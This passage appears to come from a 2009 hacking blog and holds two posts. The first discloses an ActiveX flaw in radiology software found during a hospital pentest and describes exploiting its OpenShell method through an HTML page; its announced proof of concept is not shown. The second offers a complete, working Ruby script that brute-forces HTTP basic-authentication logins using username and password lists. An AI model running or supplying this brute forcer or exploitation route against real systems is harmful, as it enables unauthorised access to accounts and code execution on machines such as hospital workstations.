Hi everyone again!!
I'd like to report an undisclosed vulnerability I found in a very commonly used Radiology Software during a pentest in a Hospital.
Technical details:
To work propery the application installs a cab file called prjkillhome.cab containing our ActiveX control.
Using ComRaider we can see that this control uses a potentially noxious function called OpenShell.
By creating an html document that invokes it it's been possible to exploit it to run arbitrary code on the victim machine.
Following is a PoC that spawn calc.exe
Tuesday, July 14, 2009
Friday, July 3, 2009
Ruby Brute Forcer for Basic Authentication
Hi everyone since I've just started my coding in ruby, I'd like to give the Hacking community a small contribution.
Here's a ruby script that given two files it attempts to brute force basic authentication login, like those of lotus notes or apache.
#!/bin/ruby require 'net/http' require 'timeout' print (" Basic Auth Bruteforcer ---------------------------- Usage: #{File.basename($0)} url uri ") if ARGV.length < 2 $stderr.puts("Usage: #{File.basename($0)}") exit end url = "#{ARGV[0]}" p url uri = "#{ARGV[1]}" p uri username = IO.readlines("user.txt") password = IO.readlines("password.txt") resp = href = ""; begin http = Net::HTTP.new(url, 80) #http.use_ssl = true username.each do |user| password.each do |pass| p "trying #{user.chomp} with password #{pass.chomp}" Timeout::timeout(3) do http.start do |http| req = Net::HTTP::Get.new(uri, {"User-Agent" => "wget"}) req.basic_auth(user.chomp, pass.chomp) response = http.request(req) case response when Net::HTTPOK p resp = response.body when Net::HTTPUnauthorized p 'Unauthorized' else p 'error' end end end end end rescue $stderr.print "Connection Failed: " + $! + "\n" rescue Timeout::Error p "Problem Connecting" end
Subscribe to:
Posts (Atom)